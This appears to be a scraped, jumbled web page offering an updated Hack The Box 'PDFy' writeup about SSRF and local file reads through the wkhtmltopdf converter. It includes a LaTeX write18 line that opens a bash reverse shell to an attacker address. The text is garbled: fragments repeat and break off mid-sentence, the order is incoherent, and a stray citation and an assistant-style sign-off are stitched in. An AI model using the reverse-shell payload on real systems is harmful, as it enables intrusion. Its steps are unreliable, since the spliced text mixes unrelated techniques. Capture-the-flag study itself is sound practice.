Pdfy Htb Writeup Upd [ LIMITED ]

cat /root/root.txt

The server responds with a PDF file, which is placed at /static/pdfs/<random_hash>.pdf . This flow shows that the backend fetches the provided URL, converts the content into a PDF, and stores it for retrieval.

cURL , Burp Suite , Python3 , Nginx / Apache (or a public VPS) 🔍 Phase 1: Information Gathering & Enumeration

Submit your payload URL: http:// /exploit.php .

PDFY - A Challenging PDF-themed Machine on Hack The Box pdfy htb writeup upd

The initial scan reveals a web server running on port 80.

That’s rare in HTB writeups.

\immediate\write18/bin/bash -c "bash -i >& /dev/tcp/10.10.14.XX/5555 0>&1"

Preventing vulnerabilities like those found in Pdfy requires a multi-layered defense: Allowlisting : Only permit requests to specific, trusted domains. Protocol Restriction : Block non-HTTP protocols like Network Isolation cat /root/root

If you’ve been grinding through Hack The Box (HTB) machines, you’ve likely come across PDFy — a retired, medium-difficulty Linux box that focuses heavily on , PDF metadata exploitation , and abusing misconfigured binaries . The “PDFy HTB Writeup UPD” is a community-driven, updated walkthrough that aims to not only guide you through the root but also explain the why behind each step.

Server-Side Request Forgery (SSRF) & Local File Inclusion (LFI) Target Binary Component: wkhtmltopdf 1. Initial Reconnaissance & Enumeration

Bookmark it, practice each step in your own lab, and try to explain the exploit to a friend. That’s how you’ll know you’ve truly mastered PDFy.

Create a PHP file (e.g., exploit.php ) on an external server or a listening platform controlled by you. The code instructs any visiting client—including the vulnerable wkhtmltopdf binary—to look directly at a local file path: PDFY - A Challenging PDF-themed Machine on Hack

Verify SSRF by receiving a "hit" on a controlled listener (like Webhook.site).

: By inspecting the PDF metadata or generating an error (e.g., submitting a local address), you can identify that the backend uses wkhtmltopdf to perform the conversion [26]. 2. Exploitation (SSRF) wkhtmltopdf

I hope this draft helps! Let me know if you want to add or modify anything.

Use SSRF to interact with this internal service: